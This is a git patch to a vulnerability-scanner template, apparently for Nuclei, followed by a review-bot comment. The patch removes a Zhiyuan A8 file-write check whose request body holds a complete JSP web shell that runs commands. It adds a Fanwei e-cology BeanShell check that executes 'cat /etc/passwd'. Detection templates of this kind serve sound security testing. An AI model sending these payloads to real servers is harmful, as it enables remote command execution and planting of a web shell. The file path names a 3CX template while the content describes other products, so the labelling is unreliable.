From 5cf7d44d120bc7d76dc827ab223fb6791dc43704 Mon Sep 17 00:00:00 2001
From: sullo
Date: Fri, 6 May 2022 16:10:15 -0400
Subject: [PATCH] Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs

---
 .../other/3cx-management-console.yaml | 47 +++++--------------
 1 file changed, 12 insertions(+), 35 deletions(-)

diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml
index 15ade36db2..782160457c 100644
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@@ -1,49 +1,26 @@ -id: CNVD-2019-19299 -# test +id: CNVD-2019-32204 +# AAAAAAAA info: - name: Zhiyuan A8 Arbitrary File Write (RCE) + name: Fanwei e-cology <= 9.0 Remote Code Execution author: daffainfo severity: critical + description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. reference: - - https://www.cxyzjd.com/article/guangying177/110177339 - - https://github.com/sectestt/CNVD-2019-19299 - tags: zhiyuan,cnvd,cnvd2019,rce + - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + tags: fanwei,cnvd,cnvd2019,rce requests: - raw: - | - POST /seeyon/htmlofficeservlet HTTP/1.1 + POST /bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - Pragma: no-cache - Cache-Control: no-cache - Upgrade-Insecure-Requests: 1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3 - Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 - Connection: close + Content-Type: application/x-www-form-urlencoded - DBSTEP V3. 
0 343 0 658 DBSTEP=OKMLlKlV - OPTION=S3WYOSWLBSGr - currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 - = WUghPB3szB3Xwg66 the CREATEDATE - recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6 - originalFileId = wV66 - originalCreateDate = wUghPB3szB3Xwg66 - FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs - needReadFile = yRWZdAS6 - originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4 - <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce + bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw - - | - GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 - Host: {{Hostname}} - - req-condition: true matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(body_1, "htmoffice operate")' - - 'contains(body_2, "Windows IP")' - condition: and + - type: regex + regex: + - "root:.*:0:0:" # Enhanced by cs on 2022/05/06
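Review bot: The second added line replaces `# test` with the placeholder `# AAAAAAAA`, which tells a reader nothing and should be dropped or replaced with a one-line note on what the template checks, e.g. `# CNVD-2019-32204: Fanwei e-cology BeanShell servlet reachable without authentication` (wording taken from the new description). The new `id` and `name` describe Fanwei e-cology, yet the file headers place this hunk in `vulnerabilities/other/3cx-management-console.yaml`; if that path is correct, the commit overwrites an unrelated 3CX template, so the name/path mismatch should be resolved before merge (inferred from the headers only). The added `description` reads as a translated advisory that mixes the finding with patch guidance; a first sentence stating what is tested, followed by the remediation note, would be clearer for anyone triaging a hit. The trailing `# Enhanced by cs on 2022/05/06` appears to have lost its `+` marker in the collapsed layout, so its side cannot be confirmed from this view.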